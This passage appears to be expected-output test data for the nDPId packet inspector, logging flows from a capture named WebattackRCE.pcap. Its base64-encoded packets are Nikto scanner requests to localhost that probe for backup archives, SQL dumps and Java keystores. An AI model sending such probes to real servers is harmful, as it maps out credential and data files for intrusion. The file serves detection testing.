{"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
